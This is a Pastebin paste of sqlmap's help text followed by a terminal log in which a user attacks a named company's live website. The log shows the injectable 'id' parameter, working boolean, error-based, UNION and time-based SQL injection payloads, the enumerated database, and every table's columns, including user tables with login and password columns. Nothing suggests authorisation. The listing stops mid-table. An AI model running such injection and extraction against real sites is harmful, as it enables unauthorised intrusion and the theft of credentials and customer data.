API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 24th, 2016
412
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 58.66 KB | None | 0 0
raw download clone embed print report
  1. Usage: python sqlmap [options]
  2.  
  3. Options:
  4. -h, --help Show basic help message and exit
  5. -hh Show advanced help message and exit
  6. --version Show program's version number and exit
  7. -v VERBOSE Verbosity level: 0-6 (default 1)
  8.  
  9. Target:
  10. At least one of these options has to be provided to set the target(s)
  11.  
  12. -u URL, --url=URL Target URL (e.g. "www.target.com/vuln.php?id=1")
  13. -g GOOGLEDORK Process Google dork results as target URLs
  14.  
  15. Request:
  16. These options can be used to specify how to connect to the target URL
  17.  
  18. --data=DATA Data string to be sent through POST
  19. --cookie=COOKIE HTTP Cookie header
  20. --random-agent Use randomly selected HTTP User-Agent header
  21. --proxy=PROXY Use a proxy to connect to the target URL
  22. --tor Use Tor anonymity network
  23. --check-tor Check to see if Tor is used properly
  24.  
  25. Injection:
  26. These options can be used to specify which parameters to test for,
  27. provide custom injection payloads and optional tampering scripts
  28.  
  29. -p TESTPARAMETER Testable parameter(s)
  30. --dbms=DBMS Force back-end DBMS to this value
  31.  
  32. Detection:
  33. These options can be used to customize the detection phase
  34.  
  35. --level=LEVEL Level of tests to perform (1-5, default 1)
  36. --risk=RISK Risk of tests to perform (0-3, default 1)
  37.  
  38. Techniques:
  39. These options can be used to tweak testing of specific SQL injection
  40. techniques
  41.  
  42. --technique=TECH SQL injection techniques to use (default "BEUSTQ")
  43.  
  44. Enumeration:
  45. These options can be used to enumerate the back-end database
  46. management system information, structure and data contained in the
  47. tables. Moreover you can run your own SQL statements
  48.  
  49. -a, --all Retrieve everything
  50. -b, --banner Retrieve DBMS banner
  51. --current-user Retrieve DBMS current user
  52. --current-db Retrieve DBMS current database
  53. --passwords Enumerate DBMS users password hashes
  54. --tables Enumerate DBMS database tables
  55. --columns Enumerate DBMS database table columns
  56. --schema Enumerate DBMS schema
  57. --dump Dump DBMS database table entries
  58. --dump-all Dump all DBMS databases tables entries
  59. -D DB DBMS database to enumerate
  60. -T TBL DBMS database table(s) to enumerate
  61. -C COL DBMS database table column(s) to enumerate
  62.  
  63. Operating system access:
  64. These options can be used to access the back-end database management
  65. system underlying operating system
  66.  
  67. --os-shell Prompt for an interactive operating system shell
  68. --os-pwn Prompt for an OOB shell, meterpreter or VNC
  69.  
  70. General:
  71. These options can be used to set some general working parameters
  72.  
  73. --batch Never ask for user input, use the default behaviour
  74. --flush-session Flush session files for current target
  75.  
  76. Miscellaneous:
  77. --wizard Simple wizard interface for beginner users
  78.  
  79. [!] to see full list of options run with '-hh'
  80.  
  81. [*] shutting down at 00:04:47
  82.  
  83. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 --dbs
  84.  
  85. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  86. http://sqlmap.org
  87.  
  88. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  89.  
  90. [*] starting at 00:04:53
  91.  
  92. [00:04:53] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  93. Are you sure you want to continue? [y/N] y
  94. [00:04:54] [INFO] testing connection to the target URL
  95. [00:04:55] [INFO] heuristics detected web page charset 'ascii'
  96. [00:04:55] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  97. [00:04:55] [INFO] testing if the target URL is stable. This can take a couple of seconds
  98. [00:04:56] [INFO] target URL is stable
  99. [00:04:56] [INFO] testing if GET parameter 'id' is dynamic
  100. [00:04:56] [INFO] confirming that GET parameter 'id' is dynamic
  101. [00:04:56] [INFO] GET parameter 'id' is dynamic
  102. [00:04:56] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
  103. [00:04:56] [INFO] testing for SQL injection on GET parameter 'id'
  104. heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
  105. do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
  106. [00:05:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  107. [00:05:25] [WARNING] reflective value(s) found and filtering out
  108. [00:05:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
  109. [00:05:35] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
  110. [00:05:37] [INFO] GET parameter 'id' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
  111. [00:05:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  112. [00:05:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
  113. [00:05:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
  114. [00:05:38] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
  115. [00:05:38] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
  116. [00:05:38] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause' injectable
  117. [00:05:38] [INFO] testing 'MySQL inline queries'
  118. [00:05:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  119. [00:05:38] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
  120. [00:05:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  121. [00:05:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  122. [00:05:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
  123. [00:05:39] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
  124. [00:05:39] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
  125. [00:05:40] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
  126. [00:06:40] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 OR time-based blind' injectable
  127. [00:06:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  128. [00:06:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
  129. [00:06:44] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
  130. [00:06:52] [INFO] target URL appears to be UNION injectable with 4 columns
  131. [00:06:53] [INFO] GET parameter 'id' is 'MySQL UNION query (random number) - 1 to 20 columns' injectable
  132. [00:06:53] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
  133. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
  134. sqlmap identified the following injection points with a total of 92 HTTP(s) requests:
  135. ---
  136. Place: GET
  137. Parameter: id
  138. Type: boolean-based blind
  139. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  140. Payload: id=-4224 OR (8424=8424)#
  141.  
  142. Type: error-based
  143. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  144. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  145.  
  146. Type: UNION query
  147. Title: MySQL UNION query (random number) - 4 columns
  148. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  149.  
  150. Type: AND/OR time-based blind
  151. Title: MySQL > 5.0.11 OR time-based blind
  152. Payload: id=-4593 OR 5414=SLEEP(5)
  153. ---
  154. [00:07:35] [INFO] the back-end DBMS is MySQL
  155. web server operating system: Windows 2008 R2 or 7
  156. web application technology: ASP.NET, Microsoft IIS 7.5
  157. back-end DBMS: MySQL 5.0
  158. [00:07:35] [INFO] fetching database names
  159. [00:07:37] [INFO] the SQL query used returns 2 entries
  160. [00:07:37] [INFO] retrieved: "information_schema"
  161. [00:07:38] [INFO] retrieved: "artefarma_bdsqlartefarma"
  162. available databases [2]:
  163. [*] artefarma_bdsqlartefarma
  164. [*] information_schema
  165.  
  166. [00:07:39] [WARNING] HTTP error codes detected during run:
  167. 500 (Internal Server Error) - 7 times
  168. [00:07:39] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  169.  
  170. [*] shutting down at 00:07:38
  171.  
  172. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma --columns
  173.  
  174. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  175. http://sqlmap.org
  176.  
  177. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  178.  
  179. [*] starting at 00:07:58
  180.  
  181. [00:07:58] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  182. Are you sure you want to continue? [y/N] y
  183. [00:07:59] [INFO] resuming back-end DBMS 'mysql'
  184. [00:07:59] [INFO] testing connection to the target URL
  185. [00:07:59] [INFO] heuristics detected web page charset 'ascii'
  186. [00:07:59] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  187. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  188. ---
  189. Place: GET
  190. Parameter: id
  191. Type: boolean-based blind
  192. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  193. Payload: id=-4224 OR (8424=8424)#
  194.  
  195. Type: error-based
  196. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  197. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  198.  
  199. Type: UNION query
  200. Title: MySQL UNION query (random number) - 4 columns
  201. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  202.  
  203. Type: AND/OR time-based blind
  204. Title: MySQL > 5.0.11 OR time-based blind
  205. Payload: id=-4593 OR 5414=SLEEP(5)
  206. ---
  207. [00:07:59] [INFO] the back-end DBMS is MySQL
  208. web server operating system: Windows 2008 R2 or 7
  209. web application technology: ASP.NET, Microsoft IIS 7.5
  210. back-end DBMS: MySQL 5.0
  211. [00:07:59] [INFO] fetching tables for database: 'artefarma_bdsqlartefarma'
  212. [00:08:01] [WARNING] reflective value(s) found and filtering out
  213. [00:08:01] [INFO] the SQL query used returns 25 entries
  214. [00:08:02] [INFO] retrieved: "arquivos"
  215. [00:08:03] [INFO] retrieved: "clientes"
  216. [00:08:04] [INFO] retrieved: "contato"
  217. [00:08:05] [INFO] retrieved: "faq"
  218. [00:08:23] [INFO] retrieved: "galeriahome"
  219. [00:08:23] [INFO] retrieved: "galeriainstitucional"
  220. [00:08:24] [INFO] retrieved: "galeriaprodutos"
  221. [00:08:25] [INFO] retrieved: "galeriaprojetosespeciais"
  222. [00:08:30] [INFO] retrieved: "log_acesso"
  223. [00:08:31] [INFO] retrieved: "loja"
  224. [00:08:31] [INFO] retrieved: "loja_imagem"
  225. [00:08:31] [INFO] retrieved: "n_emails"
  226. [00:08:32] [INFO] retrieved: "noticias"
  227. [00:08:32] [INFO] retrieved: "pagclientes"
  228. [00:08:33] [INFO] retrieved: "pagcontato"
  229. [00:08:34] [INFO] retrieved: "paghome"
  230. [00:08:34] [INFO] retrieved: "paginstitucional"
  231. [00:08:34] [INFO] retrieved: "pagorcamento"
  232. [00:08:35] [INFO] retrieved: "pastas"
  233. [00:08:35] [INFO] retrieved: "produto"
  234. [00:08:35] [INFO] retrieved: "produtos"
  235. [00:08:36] [INFO] retrieved: "projetosespeciais"
  236. [00:08:36] [INFO] retrieved: "upload"
  237. [00:08:37] [INFO] retrieved: "usuario"
  238. [00:08:37] [INFO] retrieved: "usuarios"
  239. [00:08:37] [INFO] fetching columns for table 'log_acesso' in database 'artefarma_bdsqlartefarma'
  240. [00:08:38] [INFO] the SQL query used returns 5 entries
  241. [00:08:39] [INFO] retrieved: "log_cod","int(11)"
  242. [00:08:39] [INFO] retrieved: "log_lgn","varchar(45)"
  243. [00:08:40] [INFO] retrieved: "log_dta","datetime"
  244. [00:08:41] [INFO] retrieved: "log_ip","varchar(45)"
  245. [00:08:41] [INFO] retrieved: "log_reg","varchar(500)"
  246. [00:08:41] [INFO] fetching columns for table 'n_emails' in database 'artefarma_bdsqlartefarma'
  247. [00:08:42] [INFO] the SQL query used returns 5 entries
  248. [00:08:42] [INFO] retrieved: "id","int(11)"
  249. [00:08:42] [INFO] retrieved: "nome","varchar(100)"
  250. [00:08:43] [INFO] retrieved: "email","varchar(100)"
  251. [00:08:43] [INFO] retrieved: "codigo","varchar(150)"
  252. [00:08:43] [INFO] retrieved: "ativo","varchar(1)"
  253. [00:08:44] [INFO] fetching columns for table 'galeriaprojetosespeciais' in database 'artefarma_bdsqlartefarma'
  254. [00:08:44] [INFO] the SQL query used returns 5 entries
  255. [00:08:44] [INFO] retrieved: "id","int(11)"
  256. [00:08:45] [INFO] retrieved: "titulo","varchar(100)"
  257. [00:08:45] [INFO] retrieved: "miniatura","varchar(100)"
  258. [00:08:45] [INFO] retrieved: "ampliada","varchar(100)"
  259. [00:08:46] [INFO] retrieved: "idProjeto","int(11)"
  260. [00:08:46] [INFO] fetching columns for table 'upload' in database 'artefarma_bdsqlartefarma'
  261. [00:08:46] [INFO] the SQL query used returns 5 entries
  262. [00:08:46] [INFO] retrieved: "id","int(11)"
  263. [00:08:47] [INFO] retrieved: "name","varchar(45)"
  264. [00:08:47] [INFO] retrieved: "type","varchar(45)"
  265. [00:08:47] [INFO] retrieved: "size","int(11)"
  266. [00:08:48] [INFO] retrieved: "content","mediumblob"
  267. [00:08:48] [INFO] fetching columns for table 'noticias' in database 'artefarma_bdsqlartefarma'
  268. [00:08:48] [INFO] the SQL query used returns 6 entries
  269. [00:08:49] [INFO] retrieved: "id","int(11)"
  270. [00:08:49] [INFO] retrieved: "titulo","varchar(200)"
  271. [00:08:50] [INFO] retrieved: "imagemMiniatura","varchar(200)"
  272. [00:08:50] [INFO] retrieved: "imagemAmpliada","varchar(200)"
  273. [00:08:50] [INFO] retrieved: "resumoNoticia","varchar(500)"
  274. [00:08:51] [INFO] retrieved: "texto","text"
  275. [00:08:51] [INFO] fetching columns for table 'pagclientes' in database 'artefarma_bdsqlartefarma'
  276. [00:08:51] [INFO] the SQL query used returns 2 entries
  277. [00:08:52] [INFO] retrieved: "id","int(11)"
  278. [00:08:53] [INFO] retrieved: "texto","text"
  279. [00:08:53] [INFO] fetching columns for table 'clientes' in database 'artefarma_bdsqlartefarma'
  280. [00:08:53] [INFO] the SQL query used returns 4 entries
  281. [00:08:54] [INFO] retrieved: "id","int(11)"
  282. [00:08:55] [INFO] retrieved: "cliente","varchar(100)"
  283. [00:08:55] [INFO] retrieved: "logo","varchar(100)"
  284. [00:08:56] [INFO] retrieved: "site","varchar(200)"
  285. [00:08:56] [INFO] fetching columns for table 'pastas' in database 'artefarma_bdsqlartefarma'
  286. [00:08:58] [INFO] the SQL query used returns 3 entries
  287. [00:08:58] [INFO] retrieved: "id","int(11)"
  288. [00:08:59] [INFO] retrieved: "nome","varchar(200)"
  289. [00:08:59] [INFO] retrieved: "usuario","int(11)"
  290. [00:08:59] [INFO] fetching columns for table 'loja' in database 'artefarma_bdsqlartefarma'
  291. [00:09:00] [INFO] the SQL query used returns 5 entries
  292. [00:09:00] [INFO] retrieved: "loj_cod","int(11)"
  293. [00:09:02] [INFO] retrieved: "loj_nom","varchar(100)"
  294. [00:09:02] [INFO] retrieved: "loj_end","varchar(300)"
  295. [00:09:03] [INFO] retrieved: "loj_tel","varchar(45)"
  296. [00:09:03] [INFO] retrieved: "loj_frm","int(11)"
  297. [00:09:03] [INFO] fetching columns for table 'projetosespeciais' in database 'artefarma_bdsqlartefarma'
  298. [00:09:04] [INFO] the SQL query used returns 3 entries
  299. [00:09:04] [INFO] retrieved: "id","int(11)"
  300. [00:09:04] [INFO] retrieved: "titulo","varchar(50)"
  301. [00:09:05] [INFO] retrieved: "texto","text"
  302. [00:09:05] [INFO] fetching columns for table 'produto' in database 'artefarma_bdsqlartefarma'
  303. [00:09:05] [INFO] the SQL query used returns 4 entries
  304. [00:09:06] [INFO] retrieved: "prd_cod","int(11)"
  305. [00:09:06] [INFO] retrieved: "prd_nom","varchar(45)"
  306. [00:09:06] [INFO] retrieved: "prd_img","varchar(45)"
  307. [00:09:07] [INFO] retrieved: "prd_dsc","varchar(200)"
  308. [00:09:07] [INFO] fetching columns for table 'pagorcamento' in database 'artefarma_bdsqlartefarma'
  309. [00:09:08] [INFO] the SQL query used returns 2 entries
  310. [00:09:08] [INFO] retrieved: "id","int(11)"
  311. [00:09:09] [INFO] retrieved: "texto","text"
  312. [00:09:09] [INFO] fetching columns for table 'paginstitucional' in database 'artefarma_bdsqlartefarma'
  313. [00:09:09] [INFO] the SQL query used returns 4 entries
  314. [00:09:09] [INFO] retrieved: "id","int(11)"
  315. [00:09:10] [INFO] retrieved: "imgEsquerda","varchar(100)"
  316. [00:09:10] [INFO] retrieved: "tituloTexto","varchar(400)"
  317. [00:09:10] [INFO] retrieved: "texto","text"
  318. [00:09:10] [INFO] fetching columns for table 'produtos' in database 'artefarma_bdsqlartefarma'
  319. [00:09:11] [INFO] the SQL query used returns 3 entries
  320. [00:09:11] [INFO] retrieved: "id","int(11)"
  321. [00:09:11] [INFO] retrieved: "titulo","varchar(50)"
  322. [00:09:12] [INFO] retrieved: "texto","text"
  323. [00:09:12] [INFO] fetching columns for table 'galeriahome' in database 'artefarma_bdsqlartefarma'
  324. [00:09:12] [INFO] the SQL query used returns 4 entries
  325. [00:09:13] [INFO] retrieved: "id","int(11)"
  326. [00:09:13] [INFO] retrieved: "titulo","varchar(200)"
  327. [00:09:13] [INFO] retrieved: "miniatura","varchar(200)"
  328. [00:09:14] [INFO] retrieved: "ampliada","varchar(200)"
  329. [00:09:14] [INFO] fetching columns for table 'pagcontato' in database 'artefarma_bdsqlartefarma'
  330. [00:09:14] [INFO] the SQL query used returns 3 entries
  331. [00:09:15] [INFO] retrieved: "id","int(11)"
  332. [00:09:15] [INFO] retrieved: "texto","text"
  333. [00:09:15] [INFO] retrieved: "mapa","varchar(2000)"
  334. [00:09:16] [INFO] fetching columns for table 'faq' in database 'artefarma_bdsqlartefarma'
  335. [00:09:16] [INFO] the SQL query used returns 3 entries
  336. [00:09:16] [INFO] retrieved: "id","int(11)"
  337. [00:09:17] [INFO] retrieved: "titulo","varchar(200)"
  338. [00:09:17] [INFO] retrieved: "texto","text"
  339. [00:09:17] [INFO] fetching columns for table 'galeriaprodutos' in database 'artefarma_bdsqlartefarma'
  340. [00:09:18] [INFO] the SQL query used returns 5 entries
  341. [00:09:18] [INFO] retrieved: "id","int(11)"
  342. [00:09:18] [INFO] retrieved: "titulo","varchar(100)"
  343. [00:09:19] [INFO] retrieved: "miniatura","varchar(100)"
  344. [00:09:19] [INFO] retrieved: "ampliada","varchar(100)"
  345. [00:09:19] [INFO] retrieved: "idProduto","int(11)"
  346. [00:09:19] [INFO] fetching columns for table 'loja_imagem' in database 'artefarma_bdsqlartefarma'
  347. [00:09:20] [INFO] the SQL query used returns 4 entries
  348. [00:09:20] [INFO] retrieved: "lim_cod","int(11)"
  349. [00:09:21] [INFO] retrieved: "lim_dsc","varchar(45)"
  350. [00:09:21] [INFO] retrieved: "lim_src","varchar(45)"
  351. [00:09:22] [INFO] retrieved: "lim_sup","int(11)"
  352. [00:09:22] [INFO] fetching columns for table 'usuarios' in database 'artefarma_bdsqlartefarma'
  353. [00:09:22] [INFO] the SQL query used returns 4 entries
  354. [00:09:22] [INFO] retrieved: "id","int(11)"
  355. [00:09:23] [INFO] retrieved: "nome","varchar(200)"
  356. [00:09:23] [INFO] retrieved: "login","varchar(100)"
  357. [00:09:24] [INFO] retrieved: "senha","varchar(300)"
  358. [00:09:25] [INFO] fetching columns for table 'galeriainstitucional' in database 'artefarma_bdsqlartefarma'
  359. [00:09:25] [INFO] the SQL query used returns 4 entries
  360. [00:09:25] [INFO] retrieved: "id","int(11)"
  361. [00:09:26] [INFO] retrieved: "titulo","varchar(200)"
  362. [00:09:26] [INFO] retrieved: "miniatura","varchar(100)"
  363. [00:09:26] [INFO] retrieved: "ampliada","varchar(100)"
  364. [00:09:26] [INFO] fetching columns for table 'usuario' in database 'artefarma_bdsqlartefarma'
  365. [00:09:27] [INFO] the SQL query used returns 4 entries
  366. [00:09:27] [INFO] retrieved: "usu_cod","int(11)"
  367. [00:09:28] [INFO] retrieved: "usu_nom","varchar(45)"
  368. [00:09:29] [INFO] retrieved: "usu_pwd","varchar(500)"
  369. [00:09:29] [INFO] retrieved: "usu_tip","int(11)"
  370. [00:09:30] [INFO] fetching columns for table 'arquivos' in database 'artefarma_bdsqlartefarma'
  371. [00:09:30] [INFO] the SQL query used returns 4 entries
  372. [00:09:31] [INFO] retrieved: "id","int(11)"
  373. [00:09:32] [INFO] retrieved: "nome","varchar(200)"
  374. [00:09:33] [INFO] retrieved: "arquivo","varchar(200)"
  375. [00:09:34] [INFO] retrieved: "pasta","int(11)"
  376. [00:09:34] [INFO] fetching columns for table 'contato' in database 'artefarma_bdsqlartefarma'
  377. [00:09:34] [INFO] the SQL query used returns 10 entries
  378. [00:09:35] [INFO] retrieved: "id","int(11)"
  379. [00:09:36] [INFO] retrieved: "telefone1","varchar(13)"
  380. [00:09:36] [INFO] retrieved: "telefone2","varchar(13)"
  381. [00:09:36] [INFO] retrieved: "email","varchar(50)"
  382. [00:09:37] [INFO] retrieved: "endereco","varchar(100)"
  383. [00:09:37] [INFO] retrieved: "numero","varchar(20)"
  384. [00:09:38] [INFO] retrieved: "bairro","varchar(50)"
  385. [00:09:38] [INFO] retrieved: "cidade","varchar(50)"
  386. [00:09:39] [INFO] retrieved: "estado","varchar(2)"
  387. [00:09:40] [INFO] retrieved: "cep","varchar(9)"
  388. [00:09:40] [INFO] fetching columns for table 'paghome' in database 'artefarma_bdsqlartefarma'
  389. [00:09:40] [INFO] the SQL query used returns 5 entries
  390. [00:09:41] [INFO] retrieved: "id","int(11)"
  391. [00:09:42] [INFO] retrieved: "imgDestaque","varchar(100)"
  392. [00:09:42] [INFO] retrieved: "textoDestaque","varchar(200)"
  393. [00:09:42] [INFO] retrieved: "linkDestaque","varchar(300)"
  394. [00:09:43] [INFO] retrieved: "janelaLinkDestaque","varchar(6)"
  395. Database: artefarma_bdsqlartefarma
  396. Table: log_acesso
  397. [5 columns]
  398. +---------+--------------+
  399. | Column | Type |
  400. +---------+--------------+
  401. | log_cod | int(11) |
  402. | log_dta | datetime |
  403. | log_ip | varchar(45) |
  404. | log_lgn | varchar(45) |
  405. | log_reg | varchar(500) |
  406. +---------+--------------+
  407.  
  408. Database: artefarma_bdsqlartefarma
  409. Table: n_emails
  410. [5 columns]
  411. +--------+--------------+
  412. | Column | Type |
  413. +--------+--------------+
  414. | ativo | varchar(1) |
  415. | codigo | varchar(150) |
  416. | email | varchar(100) |
  417. | id | int(11) |
  418. | nome | varchar(100) |
  419. +--------+--------------+
  420.  
  421. Database: artefarma_bdsqlartefarma
  422. Table: galeriaprojetosespeciais
  423. [5 columns]
  424. +-----------+--------------+
  425. | Column | Type |
  426. +-----------+--------------+
  427. | ampliada | varchar(100) |
  428. | id | int(11) |
  429. | idProjeto | int(11) |
  430. | miniatura | varchar(100) |
  431. | titulo | varchar(100) |
  432. +-----------+--------------+
  433.  
  434. Database: artefarma_bdsqlartefarma
  435. Table: contato
  436. [10 columns]
  437. +-----------+--------------+
  438. | Column | Type |
  439. +-----------+--------------+
  440. | bairro | varchar(50) |
  441. | cep | varchar(9) |
  442. | cidade | varchar(50) |
  443. | email | varchar(50) |
  444. | endereco | varchar(100) |
  445. | estado | varchar(2) |
  446. | id | int(11) |
  447. | numero | varchar(20) |
  448. | telefone1 | varchar(13) |
  449. | telefone2 | varchar(13) |
  450. +-----------+--------------+
  451.  
  452. Database: artefarma_bdsqlartefarma
  453. Table: noticias
  454. [6 columns]
  455. +-----------------+--------------+
  456. | Column | Type |
  457. +-----------------+--------------+
  458. | id | int(11) |
  459. | imagemAmpliada | varchar(200) |
  460. | imagemMiniatura | varchar(200) |
  461. | resumoNoticia | varchar(500) |
  462. | texto | text |
  463. | titulo | varchar(200) |
  464. +-----------------+--------------+
  465.  
  466. Database: artefarma_bdsqlartefarma
  467. Table: pagclientes
  468. [2 columns]
  469. +--------+---------+
  470. | Column | Type |
  471. +--------+---------+
  472. | id | int(11) |
  473. | texto | text |
  474. +--------+---------+
  475.  
  476. Database: artefarma_bdsqlartefarma
  477. Table: clientes
  478. [4 columns]
  479. +---------+--------------+
  480. | Column | Type |
  481. +---------+--------------+
  482. | cliente | varchar(100) |
  483. | id | int(11) |
  484. | logo | varchar(100) |
  485. | site | varchar(200) |
  486. +---------+--------------+
  487.  
  488. Database: artefarma_bdsqlartefarma
  489. Table: pastas
  490. [3 columns]
  491. +---------+--------------+
  492. | Column | Type |
  493. +---------+--------------+
  494. | id | int(11) |
  495. | nome | varchar(200) |
  496. | usuario | int(11) |
  497. +---------+--------------+
  498.  
  499. Database: artefarma_bdsqlartefarma
  500. Table: loja
  501. [5 columns]
  502. +---------+--------------+
  503. | Column | Type |
  504. +---------+--------------+
  505. | loj_cod | int(11) |
  506. | loj_end | varchar(300) |
  507. | loj_frm | int(11) |
  508. | loj_nom | varchar(100) |
  509. | loj_tel | varchar(45) |
  510. +---------+--------------+
  511.  
  512. Database: artefarma_bdsqlartefarma
  513. Table: projetosespeciais
  514. [3 columns]
  515. +--------+-------------+
  516. | Column | Type |
  517. +--------+-------------+
  518. | id | int(11) |
  519. | texto | text |
  520. | titulo | varchar(50) |
  521. +--------+-------------+
  522.  
  523. Database: artefarma_bdsqlartefarma
  524. Table: produto
  525. [4 columns]
  526. +---------+--------------+
  527. | Column | Type |
  528. +---------+--------------+
  529. | prd_cod | int(11) |
  530. | prd_dsc | varchar(200) |
  531. | prd_img | varchar(45) |
  532. | prd_nom | varchar(45) |
  533. +---------+--------------+
  534.  
  535. Database: artefarma_bdsqlartefarma
  536. Table: pagorcamento
  537. [2 columns]
  538. +--------+---------+
  539. | Column | Type |
  540. +--------+---------+
  541. | id | int(11) |
  542. | texto | text |
  543. +--------+---------+
  544.  
  545. Database: artefarma_bdsqlartefarma
  546. Table: paginstitucional
  547. [4 columns]
  548. +-------------+--------------+
  549. | Column | Type |
  550. +-------------+--------------+
  551. | id | int(11) |
  552. | imgEsquerda | varchar(100) |
  553. | texto | text |
  554. | tituloTexto | varchar(400) |
  555. +-------------+--------------+
  556.  
  557. Database: artefarma_bdsqlartefarma
  558. Table: produtos
  559. [3 columns]
  560. +--------+-------------+
  561. | Column | Type |
  562. +--------+-------------+
  563. | id | int(11) |
  564. | texto | text |
  565. | titulo | varchar(50) |
  566. +--------+-------------+
  567.  
  568. Database: artefarma_bdsqlartefarma
  569. Table: galeriahome
  570. [4 columns]
  571. +-----------+--------------+
  572. | Column | Type |
  573. +-----------+--------------+
  574. | ampliada | varchar(200) |
  575. | id | int(11) |
  576. | miniatura | varchar(200) |
  577. | titulo | varchar(200) |
  578. +-----------+--------------+
  579.  
  580. Database: artefarma_bdsqlartefarma
  581. Table: pagcontato
  582. [3 columns]
  583. +--------+---------------+
  584. | Column | Type |
  585. +--------+---------------+
  586. | id | int(11) |
  587. | mapa | varchar(2000) |
  588. | texto | text |
  589. +--------+---------------+
  590.  
  591. Database: artefarma_bdsqlartefarma
  592. Table: faq
  593. [3 columns]
  594. +--------+--------------+
  595. | Column | Type |
  596. +--------+--------------+
  597. | id | int(11) |
  598. | texto | text |
  599. | titulo | varchar(200) |
  600. +--------+--------------+
  601.  
  602. Database: artefarma_bdsqlartefarma
  603. Table: galeriaprodutos
  604. [5 columns]
  605. +-----------+--------------+
  606. | Column | Type |
  607. +-----------+--------------+
  608. | ampliada | varchar(100) |
  609. | id | int(11) |
  610. | idProduto | int(11) |
  611. | miniatura | varchar(100) |
  612. | titulo | varchar(100) |
  613. +-----------+--------------+
  614.  
  615. Database: artefarma_bdsqlartefarma
  616. Table: loja_imagem
  617. [4 columns]
  618. +---------+-------------+
  619. | Column | Type |
  620. +---------+-------------+
  621. | lim_cod | int(11) |
  622. | lim_dsc | varchar(45) |
  623. | lim_src | varchar(45) |
  624. | lim_sup | int(11) |
  625. +---------+-------------+
  626.  
  627. Database: artefarma_bdsqlartefarma
  628. Table: usuarios
  629. [4 columns]
  630. +--------+--------------+
  631. | Column | Type |
  632. +--------+--------------+
  633. | id | int(11) |
  634. | login | varchar(100) |
  635. | nome | varchar(200) |
  636. | senha | varchar(300) |
  637. +--------+--------------+
  638.  
  639. Database: artefarma_bdsqlartefarma
  640. Table: galeriainstitucional
  641. [4 columns]
  642. +-----------+--------------+
  643. | Column | Type |
  644. +-----------+--------------+
  645. | ampliada | varchar(100) |
  646. | id | int(11) |
  647. | miniatura | varchar(100) |
  648. | titulo | varchar(200) |
